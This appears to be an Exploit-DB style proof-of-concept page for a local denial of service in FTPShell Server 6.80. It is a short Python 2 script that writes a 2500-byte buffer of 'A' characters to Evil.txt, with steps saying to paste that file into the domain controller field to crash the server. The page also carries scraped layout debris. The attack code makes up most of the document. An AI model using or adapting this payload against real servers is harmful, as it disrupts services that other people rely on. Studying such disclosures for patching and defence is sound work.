20 lines
No EOL
588 B
Text
20 lines
No EOL
588 B
Text
# Exploit Title: FTPShell Server 6.80 - Local Denial of Service
|
|
# Exploit Author: Hashim Jawad
|
|
# Date: 2018-05-23
|
|
# Vendor Homepage: http://www.ftpshell.com/
|
|
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm
|
|
# Tested on: Windows 7 Enterprise - SP1 (x86)
|
|
# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = '\x41' * 2500
|
|
|
|
try:
|
|
f=open("Evil.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except Exception as e:
|
|
print e |